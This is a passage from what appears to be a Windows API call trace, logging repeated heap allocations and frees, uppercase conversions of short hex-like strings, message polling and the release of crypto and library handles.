RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0256.800] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.800] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.800] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.800] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.800] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.801] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0256.801] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.801] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.801] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.802] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.802] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.802] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.802] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.802] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.803] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.805] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.805] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.805] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.806] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.806] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.806] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.807] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.807] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.807] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.807] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.808] CloseHandle (hObject=0x1f8) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0256.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.811] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0256.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0256.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.813] CloseHandle (hObject=0x2cc) returned 1 [0256.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.822] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0256.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 